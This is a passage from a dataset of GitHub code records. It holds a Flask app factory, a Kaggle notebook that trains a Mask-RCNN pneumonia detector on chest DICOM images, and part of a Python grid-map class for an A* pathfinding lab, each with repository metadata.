"usage_type": "name"}, {"api_name": "tensorflow.add", "line_number": 195, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 200, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 203, "usage_type": "name"}]}
+{"seq_id": "32921679262", "text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom logging.handlers import RotatingFileHandler\nfrom flask import Flask\nfrom flask.logging import default_handler\nfrom redap.core import ldap, db, migrate\n\n\ndef create_app(package_name, *args, **kwargs):\n app = Flask(package_name, *args, instance_relative_config=True, **kwargs)\n\n # Fetch settings from config file\n app.config.from_object('redap.settings.core')\n app.config.from_object('redap.settings.ldap')\n\n # Init flask-ldapconn extension\n ldap.init_app(app)\n\n # Init SQLAlchemy\n db.init_app(app)\n migrate.init_app(app, db)\n\n if app.config['ENV'] == 'production':\n formatter = logging.Formatter(app.config['LOG_FORMAT'])\n\n handler = RotatingFileHandler('logs/application.log', maxBytes=10000, backupCount=3)\n handler.setLevel(logging.INFO)\n handler.setFormatter(formatter)\n\n app.logger.setLevel(logging.INFO)\n app.logger.addHandler(handler)\n app.logger.removeHandler(default_handler)\n\n # Check for errors upon request teardown\n @app.teardown_request\n def log_errors(error):\n if error is None:\n return\n\n app.logger.error(\"An error occurred while handling the request\", error)\n\n return app\n", "repo_name": "rbw/redap", "sub_path": "redap/factory.py", "file_name": "factory.py", "file_ext": "py", "file_size_in_byte": 1249, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 27, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 11, "usage_type": "call"}, {"api_name": "redap.core.ldap.init_app", "line_number": 18, "usage_type": "call"}, {"api_name": "redap.core.ldap", "line_number": 18, "usage_type": "name"}, {"api_name": "redap.core.db.init_app", "line_number": 21, "usage_type": "call"}, {"api_name": "redap.core.db", "line_number": 21, "usage_type": "name"}, {"api_name": "redap.core.migrate.init_app", "line_number": 22, "usage_type": "call"}, {"api_name": "redap.core.db", "line_number": 22, "usage_type": "argument"}, {"api_name": "redap.core.migrate", "line_number": 22, "usage_type": "name"}, {"api_name": "logging.Formatter", "line_number": 25, "usage_type": "call"}, {"api_name": "logging.handlers.RotatingFileHandler", "line_number": 27, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 28, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.logging.default_handler", "line_number": 33, "usage_type": "argument"}]}
+{"seq_id": "10148034345", "text": "import os \nimport sys\nimport random\nimport math\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport json\nimport pydicom\nfrom imgaug import augmenters as iaa\nfrom tqdm import tqdm\nimport pandas as pd \nimport glob \n\n# ### First: Install Kaggle API for download competition data.\n\n# In[ ]:\n\n\nDATA_DIR = '/kaggle/input'\n\n# Directory to save logs and trained model\nROOT_DIR = '/kaggle/working'\n\n# ### MD.ai Annotator \n# \n# Additionally, If you are interested in augmenting the existing annotations, you can use the MD.ai annotator to view DICOM images, and create annotatios to be exported. \n# MD.ai annotator project URL for the Kaggle dataset: https://public.md.ai/annotator/project/LxR6zdR2/workspace\n# \n# **Annotator features**\n# - The annotator can be used to view DICOM images and create image and exam level annotations.\n# - You can apply the annotator to filter by label, adjudicate annotations, and assign annotation tasks to your team.\n# - Notebooks can be built directly within the annotator for rapid model development.\n# - The data wrangling is abstracted away by the interface and by our MD.ai library.\n# - Simplifies image annotation in order to widen the participation in the futrue of medical image deep learning.\n# \n# The annotator allows you to create initial annotations, build and run models, modify/finetune the annotations based on predicted values, and repeat. \n# The MD.ai python client library implements functions to easily download images and annotations and to prepare the datasets used to train the model for classification. See the following example notebook for parsing annotations and training using MD.ai annotator: \n# https://github.com/mdai/ml-lessons/blob/master/lesson3-rsna-pneumonia-detection-mdai-client-lib.ipynb \n# - MD.ai URL: https://www.md.ai \n# - MD.ai documentation URL: https://docs.md.ai/\n\n# ### Install Matterport's Mask-RCNN model from github.\n# See the [Matterport's implementation of Mask-RCNN](https://github.com/matterport/Mask_RCNN).\n\n# In[ ]:\n\n\nos.chdir('Mask_RCNN')\n#!python setup.py -q install\n\n# In[ ]:\n\n\n# Import Mask RCNN\nsys.path.append(os.path.join(ROOT_DIR, 'Mask_RCNN')) # To find local version of the library\nfrom mrcnn.config import Config\nfrom mrcnn import utils\nimport mrcnn.model as modellib\nfrom mrcnn import visualize\nfrom mrcnn.model import log\n\n# In[ ]:\n\n\ntrain_dicom_dir = os.path.join(DATA_DIR, 'stage_1_train_images')\ntest_dicom_dir = os.path.join(DATA_DIR, 'stage_1_test_images')\n\n# ### Some setup functions and classes for Mask-RCNN\n# \n# - dicom_fps is a list of the dicom image path and filenames \n# - image_annotions is a dictionary of the annotations keyed by the filenames\n# - parsing the dataset returns a list of the image filenames and the annotations dictionary\n\n# In[ ]:\n\n\ndef get_dicom_fps(dicom_dir):\n dicom_fps = glob.glob(dicom_dir+'/'+'*.dcm')\n return list(set(dicom_fps))\n\ndef parse_dataset(dicom_dir, anns): \n image_fps = get_dicom_fps(dicom_dir)\n image_annotations = {fp: [] for fp in image_fps}\n for index, row in anns.iterrows(): \n fp = os.path.join(dicom_dir, row['patientId']+'.dcm')\n image_annotations[fp].append(row)\n return image_fps, image_annotations \n\n# In[ ]:\n\n\n# The following parameters have been selected to reduce running time for demonstration purposes \n# These are not optimal \n\nclass DetectorConfig(Config):\n \"\"\"Configuration for training pneumonia detection on the RSNA pneumonia dataset.\n Overrides values in the base Config class.\n \"\"\"\n \n # Give the configuration a recognizable name \n NAME = 'pneumonia'\n \n # Train on 1 GPU and 8 images per GPU. We can put multiple images on each\n # GPU because the images are small. Batch size is 8 (GPUs * images/GPU).\n GPU_COUNT = 1\n IMAGES_PER_GPU = 8 \n \n BACKBONE = 'resnet50'\n \n NUM_CLASSES = 2 # background + 1 pneumonia classes\n \n IMAGE_MIN_DIM = 256\n IMAGE_MAX_DIM = 256\n RPN_ANCHOR_SCALES = (32, 64, 128, 256)\n TRAIN_ROIS_PER_IMAGE = 32\n MAX_GT_INSTANCES = 3\n DETECTION_MAX_INSTANCES = 3\n DETECTION_MIN_CONFIDENCE = 0.9\n DETECTION_NMS_THRESHOLD = 0.1\n\n STEPS_PER_EPOCH = 100\n \nconfig = DetectorConfig()\nconfig.display()\n\n# In[ ]:\n\n\nclass DetectorDataset(utils.Dataset):\n \"\"\"Dataset class for training pneumonia detection on the RSNA pneumonia dataset.\n \"\"\"\n\n def __init__(self, image_fps, image_annotations, orig_height, orig_width):\n super().__init__(self)\n \n # Add classes\n self.add_class('pneumonia', 1, 'Lung Opacity')\n \n # add images \n for i, fp in enumerate(image_fps):\n annotations = image_annotations[fp]\n self.add_image('pneumonia', image_id=i, path=fp, \n annotations=annotations, orig_height=orig_height, orig_width=orig_width)\n \n def image_reference(self, image_id):\n info = self.image_info[image_id]\n return info['path']\n\n def load_image(self, image_id):\n info = self.image_info[image_id]\n fp = info['path']\n ds = pydicom.read_file(fp)\n image = ds.pixel_array\n # If grayscale. Convert to RGB for consistency.\n if len(image.shape) != 3 or image.shape[2] != 3:\n image = np.stack((image,) * 3, -1)\n return image\n\n def load_mask(self, image_id):\n info = self.image_info[image_id]\n annotations = info['annotations']\n count = len(annotations)\n if count == 0:\n mask = np.zeros((info['orig_height'], info['orig_width'], 1), dtype=np.uint8)\n class_ids = np.zeros((1,), dtype=np.int32)\n else:\n mask = np.zeros((info['orig_height'], info['orig_width'], count), dtype=np.uint8)\n class_ids = np.zeros((count,), dtype=np.int32)\n for i, a in enumerate(annotations):\n if a['Target'] == 1:\n x = int(a['x'])\n y = int(a['y'])\n w = int(a['width'])\n h = int(a['height'])\n mask_instance = mask[:, :, i].copy()\n cv2.rectangle(mask_instance, (x, y), (x+w, y+h), 255, -1)\n mask[:, :, i] = mask_instance\n class_ids[i] = 1\n return mask.astype(np.bool), class_ids.astype(np.int32)\n\n# ### Examine the annotation data, parse the dataset, and view dicom fields\n\n# In[ ]:\n\n\n# training dataset\nanns = pd.read_csv(os.path.join(DATA_DIR, 'stage_1_train_labels.csv'))\nanns.head()\n\n# In[ ]:\n\n\nimage_fps, image_annotations = parse_dataset(train_dicom_dir, anns=anns)\n\n# In[ ]:\n\n\nds = pydicom.read_file(image_fps[0]) # read dicom image from filepath \nimage = ds.pixel_array # get image array\n\n# In[ ]:\n\n\n# show dicom fields \nds\n\n# In[ ]:\n\n\n# Original DICOM image size: 1024 x 1024\nORIG_SIZE = 1024\n\n# ### Split the data into training and validation datasets\n# **Note: We have only used only a portion of the images for demonstration purposes. See comments below.**\n# \n# - To use all the images do: image_fps_list = list(image_fps)\n# - Or change the number of images from 100 to a custom number\n\n# In[ ]:\n\n\n######################################################################\n# Modify this line to use more or fewer images for training/validation. \n# To use all images, do: image_fps_list = list(image_fps)\nimage_fps_list = list(image_fps[:1000]) \n#####################################################################\n\n# split dataset into training vs. validation dataset \n# split ratio is set to 0.9 vs. 0.1 (train vs. validation, respectively)\nsorted(image_fps_list)\nrandom.seed(42)\nrandom.shuffle(image_fps_list)\n\nvalidation_split = 0.1\nsplit_index = int((1 - validation_split) * len(image_fps_list))\n\nimage_fps_train = image_fps_list[:split_index]\nimage_fps_val = image_fps_list[split_index:]\n\nprint(len(image_fps_train), len(image_fps_val))\n\n# ### Create and prepare the training dataset using the DetectorDataset class.\n\n# In[ ]:\n\n\n# prepare the training dataset\ndataset_train = DetectorDataset(image_fps_train, image_annotations, ORIG_SIZE, ORIG_SIZE)\ndataset_train.prepare()\n\n# ### Let's look at a sample annotation. We see a bounding box with (x, y) of the the top left corner as well as the width and height.\n\n# In[ ]:\n\n\n# Show annotation(s) for a DICOM image \ntest_fp = random.choice(image_fps_train)\nimage_annotations[test_fp]\n\n# In[ ]:\n\n\n# prepare the validation dataset\ndataset_val = DetectorDataset(image_fps_val, image_annotations, ORIG_SIZE, ORIG_SIZE)\ndataset_val.prepare()\n\n# ### Display a random image with bounding boxes\n\n# In[ ]:\n\n\n# Load and display random samples and their bounding boxes\n# Suggestion: Run this a few times to see different examples. \n\nimage_id = random.choice(dataset_train.image_ids)\nimage_fp = dataset_train.image_reference(image_id)\nimage = dataset_train.load_image(image_id)\nmask, class_ids = dataset_train.load_mask(image_id)\n\nprint(image.shape)\n\nplt.figure(figsize=(10, 10))\nplt.subplot(1, 2, 1)\nplt.imshow(image[:, :, 0], cmap='gray')\nplt.axis('off')\n\nplt.subplot(1, 2, 2)\nmasked = np.zeros(image.shape[:2])\nfor i in range(mask.shape[2]):\n masked += image[:, :, 0] * mask[:, :, i]\nplt.imshow(masked, cmap='gray')\nplt.axis('off')\n\nprint(image_fp)\nprint(class_ids)\n\n# In[ ]:\n\n\nmodel = modellib.MaskRCNN(mode='training', config=config, model_dir=ROOT_DIR)\n\n# ### Image Augmentation. Try finetuning some variables to custom values\n\n# In[ ]:\n\n\n# Image augmentation \naugmentation = iaa.SomeOf((0, 1), [\n iaa.Fliplr(0.5),\n iaa.Affine(\n scale={\"x\": (0.8, 1.2), \"y\": (0.8, 1.2)},\n translate_percent={\"x\": (-0.2, 0.2), \"y\": (-0.2, 0.2)},\n rotate=(-25, 25),\n shear=(-8, 8)\n ),\n iaa.Multiply((0.9, 1.1))\n])\n\n# ### Now it's time to train the model. Note that training even a basic model can take a few hours. \n# \n# Note: the following model is for demonstration purpose only. We have limited the training to one epoch, and have set nominal values for the Detector Configuration to reduce run-time. \n# \n# - dataset_train and dataset_val are derived from DetectorDataset \n# - DetectorDataset loads images from image filenames and masks from the annotation data\n# - model is Mask-RCNN\n\n# In[ ]:\n\n\nNUM_EPOCHS = 1\n\n# Train Mask-RCNN Model \nimport warnings \nwarnings.filterwarnings(\"ignore\")\nmodel.train(dataset_train, dataset_val, \n learning_rate=config.LEARNING_RATE, \n epochs=NUM_EPOCHS, \n layers='all',\n augmentation=augmentation)\n\n# In[ ]:\n\n\n# select trained model \ndir_names = next(os.walk(model.model_dir))[1]\nkey = config.NAME.lower()\ndir_names = filter(lambda f: f.startswith(key), dir_names)\ndir_names = sorted(dir_names)\n\nif not dir_names:\n import errno\n raise FileNotFoundError(\n errno.ENOENT,\n \"Could not find model directory under {}\".format(self.model_dir))\n \nfps = []\n# Pick last directory\nfor d in dir_names: \n dir_name = os.path.join(model.model_dir, d)\n # Find the last checkpoint\n checkpoints = next(os.walk(dir_name))[2]\n checkpoints = filter(lambda f: f.startswith(\"mask_rcnn\"), checkpoints)\n checkpoints = sorted(checkpoints)\n if not checkpoints:\n print('No weight files in {}'.format(dir_name))\n else: \n \n checkpoint = os.path.join(dir_name, checkpoints[-1])\n fps.append(checkpoint)\n\nmodel_path = sorted(fps)[-1]\nprint('Found model {}'.format(model_path))\n\n# In[ ]:\n\n\nclass InferenceConfig(DetectorConfig):\n GPU_COUNT = 1\n IMAGES_PER_GPU = 1\n\ninference_config = InferenceConfig()\n\n# Recreate the model in inference mode\nmodel = modellib.MaskRCNN(mode='inference', \n config=inference_config,\n model_dir=ROOT_DIR)\n\n# Load trained weights (fill in path to trained weights here)\nassert model_path != \"\", \"Provide path to trained weights\"\nprint(\"Loading weights from \", model_path)\nmodel.load_weights(model_path, by_name=True)\n\n# In[ ]:\n\n\n# set color for class\ndef get_colors_for_class_ids(class_ids):\n colors = []\n for class_id in class_ids:\n if class_id == 1:\n colors.append((.941, .204, .204))\n return colors\n\n# ### How does the predicted box compared to the expected value? Let's use the validation dataset to check. \n# \n# Note that we trained only one epoch for **demonstration purposes ONLY**. You might be able to improve performance running more epochs. \n\n# In[ ]:\n\n\n# Show few example of ground truth vs. predictions on the validation dataset \ndataset = dataset_val\nfig = plt.figure(figsize=(10, 30))\n\nfor i in range(4):\n\n image_id = random.choice(dataset.image_ids)\n \n original_image, image_meta, gt_class_id, gt_bbox, gt_mask =\\\n modellib.load_image_gt(dataset_val, inference_config, \n image_id, use_mini_mask=False)\n \n print(original_image.shape)\n plt.subplot(6, 2, 2*i + 1)\n visualize.display_instances(original_image, gt_bbox, gt_mask, gt_class_id, \n dataset.class_names,\n colors=get_colors_for_class_ids(gt_class_id), ax=fig.axes[-1])\n \n plt.subplot(6, 2, 2*i + 2)\n results = model.detect([original_image]) #, verbose=1)\n r = results[0]\n visualize.display_instances(original_image, r['rois'], r['masks'], r['class_ids'], \n dataset.class_names, r['scores'], \n colors=get_colors_for_class_ids(r['class_ids']), ax=fig.axes[-1])\n\n# In[ ]:\n\n\n# Get filenames of test dataset DICOM images\ntest_image_fps = get_dicom_fps(test_dicom_dir)\n\n# ### Final steps - Create the submission file\n\n# In[ ]:\n\n\n# Make predictions on test images, write out sample submission \ndef predict(image_fps, filepath='submission.csv', min_conf=0.95): \n \n # assume square image\n resize_factor = ORIG_SIZE / config.IMAGE_SHAPE[0]\n #resize_factor = ORIG_SIZE \n with open(filepath, 'w') as file:\n for image_id in tqdm(image_fps): \n ds = pydicom.read_file(image_id)\n image = ds.pixel_array\n # If grayscale. Convert to RGB for consistency.\n if len(image.shape) != 3 or image.shape[2] != 3:\n image = np.stack((image,) * 3, -1) \n image, window, scale, padding, crop = utils.resize_image(\n image,\n min_dim=config.IMAGE_MIN_DIM,\n min_scale=config.IMAGE_MIN_SCALE,\n max_dim=config.IMAGE_MAX_DIM,\n mode=config.IMAGE_RESIZE_MODE)\n \n patient_id = os.path.splitext(os.path.basename(image_id))[0]\n\n results = model.detect([image])\n r = results[0]\n\n out_str = \"\"\n out_str += patient_id \n out_str += \",\"\n assert( len(r['rois']) == len(r['class_ids']) == len(r['scores']) )\n if len(r['rois']) == 0: \n pass\n else: \n num_instances = len(r['rois'])\n \n for i in range(num_instances): \n if r['scores'][i] > min_conf: \n out_str += ' '\n out_str += str(round(r['scores'][i], 2))\n out_str += ' '\n\n # x1, y1, width, height \n x1 = r['rois'][i][1]\n y1 = r['rois'][i][0]\n width = r['rois'][i][3] - x1 \n height = r['rois'][i][2] - y1 \n bboxes_str = \"{} {} {} {}\".format(x1*resize_factor, y1*resize_factor, \\\n width*resize_factor, height*resize_factor) \n# bboxes_str = \"{} {} {} {}\".format(x1, y1, \\\n# width, height)\n out_str += bboxes_str\n\n file.write(out_str+\"\\n\")\n\n# In[ ]:\n\n\n# predict only the first 50 entries\nsubmission_fp = os.path.join(ROOT_DIR, 'submission.csv')\nprint(submission_fp)\npredict(test_image_fps, filepath=submission_fp)\n\n# In[ ]:\n\n\noutput = pd.read_csv(submission_fp, names=['patientId', 'PredictionString'])\noutput.head(100)\n\n# In[ ]:\n\n\n## show submission.csv content\n#os.chdir(ROOT_DIR)\n#!cat submission.csv\n\n# In[ ]:\n\n\n# show a few test image detection example\ndef visualize(): \n image_id = random.choice(test_image_fps)\n ds = pydicom.read_file(image_id)\n \n # original image \n image = ds.pixel_array\n \n # assume square image \n resize_factor = ORIG_SIZE / config.IMAGE_SHAPE[0]\n \n # If grayscale. Convert to RGB for consistency.\n if len(image.shape) != 3 or image.shape[2] != 3:\n image = np.stack((image,) * 3, -1) \n resized_image, window, scale, padding, crop = utils.resize_image(\n image,\n min_dim=config.IMAGE_MIN_DIM,\n min_scale=config.IMAGE_MIN_SCALE,\n max_dim=config.IMAGE_MAX_DIM,\n mode=config.IMAGE_RESIZE_MODE)\n\n patient_id = os.path.splitext(os.path.basename(image_id))[0]\n print(patient_id)\n\n results = model.detect([resized_image])\n r = results[0]\n for bbox in r['rois']: \n print(bbox)\n x1 = int(bbox[1] * resize_factor)\n y1 = int(bbox[0] * resize_factor)\n x2 = int(bbox[3] * resize_factor)\n y2 = int(bbox[2] * resize_factor)\n cv2.rectangle(image, (x1,y1), (x2,y2), (77, 255, 9), 3, 1)\n width = x2 - x1 \n height = y2 - y1 \n print(\"x {} y {} h {} w {}\".format(x1, y1, width, height))\n plt.figure() \n plt.imshow(image, cmap=plt.cm.gist_gray)\n\nvisualize()\n\n# In[ ]:\n\n\n# remove files to allow committing (hit files limit otherwise)\n", "repo_name": "tetherless-world/CodeGraph", "sub_path": "kaggle/python_files/sample774.py", "file_name": "sample774.py", "file_ext": "py", "file_size_in_byte": 17459, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.chdir", "line_number": 49, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 56, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "mrcnn.config.Config", "line_number": 96, "usage_type": "name"}, {"api_name": "mrcnn.utils.Dataset", "line_number": 130, "usage_type": "attribute"}, {"api_name": "mrcnn.utils", "line_number": 130, "usage_type": "name"}, {"api_name": "pydicom.read_file", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 165, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 166, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 168, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 169, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 177, "usage_type": "call"}, {"api_name": "numpy.bool", "line_number": 180, "usage_type": "attribute"}, {"api_name": "numpy.int32", "line_number": 180, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 188, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 188, "usage_type": "call"}, {"api_name": "os.path", "line_number": 188, "usage_type": "attribute"}, {"api_name": "pydicom.read_file", "line_number": 199, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 232, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 233, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 258, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 276, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 283, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 283, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 284, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 284, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 285, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 285, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 286, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 286, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 288, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 288, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 289, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 292, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 292, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 293, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 293, "usage_type": "name"}, {"api_name": "mrcnn.model.MaskRCNN", "line_number": 301, "usage_type": "call"}, {"api_name": "mrcnn.model", "line_number": 301, "usage_type": "name"}, {"api_name": "imgaug.augmenters.SomeOf", "line_number": 309, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 309, "usage_type": "name"}, {"api_name": "imgaug.augmenters.Fliplr", "line_number": 310, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 310, "usage_type": "name"}, {"api_name": "imgaug.augmenters.Affine", "line_number": 311, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 311, "usage_type": "name"}, {"api_name": "imgaug.augmenters.Multiply", "line_number": 317, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 317, "usage_type": "name"}, {"api_name": "warnings.filterwarnings", "line_number": 335, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 346, "usage_type": "call"}, {"api_name": "errno.ENOENT", "line_number": 354, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 360, "usage_type": "call"}, {"api_name": "os.path", "line_number": 360, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 362, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 369, "usage_type": "call"}, {"api_name": "os.path", "line_number": 369, "usage_type": "attribute"}, {"api_name": "mrcnn.model.MaskRCNN", "line_number": 385, "usage_type": "call"}, {"api_name": "mrcnn.model", "line_number": 385, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 414, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 414, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 418, "usage_type": "call"}, {"api_name": "mrcnn.model.load_image_gt", "line_number": 421, "usage_type": "call"}, {"api_name": "mrcnn.model", "line_number": 421, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 425, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 425, "usage_type": "name"}, {"api_name": "mrcnn.visualize.display_instances", "line_number": 426, "usage_type": "call"}, {"api_name": "mrcnn.visualize", "line_number": 426, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 430, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 430, "usage_type": "name"}, {"api_name": "mrcnn.visualize.display_instances", "line_number": 433, "usage_type": "call"}, {"api_name": "mrcnn.visualize", "line_number": 433, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 455, "usage_type": "call"}, {"api_name": "pydicom.read_file", "line_number": 456, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 460, "usage_type": "call"}, {"api_name": "mrcnn.utils.resize_image", "line_number": 461, "usage_type": "call"}, {"api_name": "mrcnn.utils", "line_number": 461, "usage_type": "name"}, {"api_name": "os.path.splitext", "line_number": 468, "usage_type": "call"}, {"api_name": "os.path", "line_number": 468, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 468, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 505, "usage_type": "call"}, {"api_name": "os.path", "line_number": 505, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 512, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 527, "usage_type": "call"}, {"api_name": "pydicom.read_file", "line_number": 528, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 538, "usage_type": "call"}, {"api_name": "mrcnn.utils.resize_image", "line_number": 539, "usage_type": "call"}, {"api_name": "mrcnn.utils", "line_number": 539, "usage_type": "name"}, {"api_name": "os.path.splitext", "line_number": 546, "usage_type": "call"}, {"api_name": "os.path", "line_number": 546, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 546, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 557, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 561, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 561, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 562, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 562, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 562, "usage_type": "attribute"}, {"api_name": "mrcnn.visualize", "line_number": 564, "usage_type": "call"}]}
+{"seq_id": "23709131351", "text": "from random import randint\nfrom enum import Enum\n\nclass MAP_ENTRY_TYPE(Enum): # это перечисление определяет различные типы ячеек, которые могут присутствовать на карте.\n\tMAP_EMPTY = 0,\n\tMAP_BLOCK = 1,\n\tMAP_TARGET = 2,\n\tMAP_PATH = 3,\n\nclass WALL_DIRECTION(Enum): # это перечисление определяет различные направления, в которых может быть обращена стена.\n\tWALL_LEFT = 0,\n\tWALL_UP = 1,\n\tWALL_RIGHT = 2,\n\tWALL_DOWN = 3,\n\t\nmap_entry_types = {0:MAP_ENTRY_TYPE.MAP_EMPTY, 1:MAP_ENTRY_TYPE.MAP_BLOCK, 2:MAP_ENTRY_TYPE.MAP_TARGET, 3:MAP_ENTRY_TYPE.MAP_PATH}\n# сопоставляет целочисленные значения с элементами перечисления MAP_ENTRY_TYPE. \n# Это используется методом getType для преобразования целочисленного значения ячейки в соответствующее значение MAP_ENTRY_TYPE.\nclass Map():\n\tdef __init__(self, width, height): \n\t\tself.width = width\n\t\tself.height = height\n\t\tself.map = [[0 for x in range(self.width)] for y in range(self.height)]\n# конструктор класса Map, который инициализирует ширину и высоту карты и создает пустую двумерную сетку ячеек с указанными размерами.\t\n\tdef generatePos(self, rangeX, rangeY):\n\t\tx, y = (randint(rangeX[0], rangeX[1]), randint(rangeY[0], rangeY[1]))\n\t\twhile self.map[y][x] == 1:\n\t\t\tx, y = (randint(rangeX[0], rangeX[1]), randint(rangeY[0], rangeY[1]))\n\t\treturn (x , y)\n# этот метод генерирует случайную позицию (x, y) в пределах указанного диапазона значений x и y. \n# Он продолжает генерировать новые случайные позиции, пока не найдет ту, которая не является заблокированной ячейкой (т. е. ячейкой со значением 1).\t\n\tdef resetMap(self, value):\n\t\tfor y in range(self.height):\n\t\t\tfor x in range(self.width):\n\t\t\t\tself.setMap(x, y, value)\n# этот метод сбрасывает всю карту, устанавливая для всех ячеек указанное значение.\n\tdef setMap(self, x, y, value):\n\t\tif value == MAP_ENTRY_TYPE.MAP_EMPTY:\n\t\t\tself.map[y][x] = 0\n\t\telif value == MAP_ENTRY_TYPE.MAP_BLOCK:\n\t\t\tself.map[y][x] = 1\n\t\telif value == MAP_ENTRY_TYPE.MAP_TARGET:\n\t\t\tself.map[y][x] = 2\n\t\telse:\n\t\t\tself.map[y][x] = 3\n# этот метод устанавливает значение ячейки в позиции (x, y) на указанное значение.\n\tdef isVisited(self, x, y):\n\t\treturn self.map[y][x] != 1\n# этот метод возвращает True, если ячейка в позиции (x, y) не была посещена (т. е. ее значение не равно 1), и False в противном случае.\n\tdef isMovable(self, x, y):\n\t\treturn self.map[y][x] != 1\n# этот метод возвращает True, если ячейка в позиции (x, y) не является заблокированной ячейкой (т. е. ее значение не равно 1), и False в противном случае.\t\n# \t\n\tdef isValid(self, x, y):\n\t\tif x < 0 or x >= self.width or y < 0 or y >= self.height:\n\t\t\treturn False\n\t\treturn True\n# этот метод возвращает True, если позиция (x, y) находится в пределах границ карты, и False в противном случае.\t\n\tdef getType(self, x, y):\n\t\treturn map_entry_types[self.map[y][x]]\n# этот метод возвращает тип ячейки в позиции (x, y) как элемент перечисления MAP_ENTRY_TYPE.\n\tdef showMap(self):\n\t\tfor row in self.map:\n\t\t\ts = ''\n\t\t\tfor entry in row:\n\t\t\t\tif entry == 0:\n\t\t\t\t\ts += ' 0'\n\t\t\t\telif entry == 1:\n\t\t\t\t\ts += ' #'\n\t\t\t\telse:\n\t\t\t\t\ts += ' X'\n\t\t\tprint(s)\n# этот метод выводит карту на консоль с заблокированными ячейками, представленными '#', и всеми остальными ячейками, представленными символом пробела.\t", "repo_name": "NikitaBukreyev/algoritms", "sub_path": "lab2/a_star/GameMap.py", "file_name": "GameMap.py", "file_ext": "py", 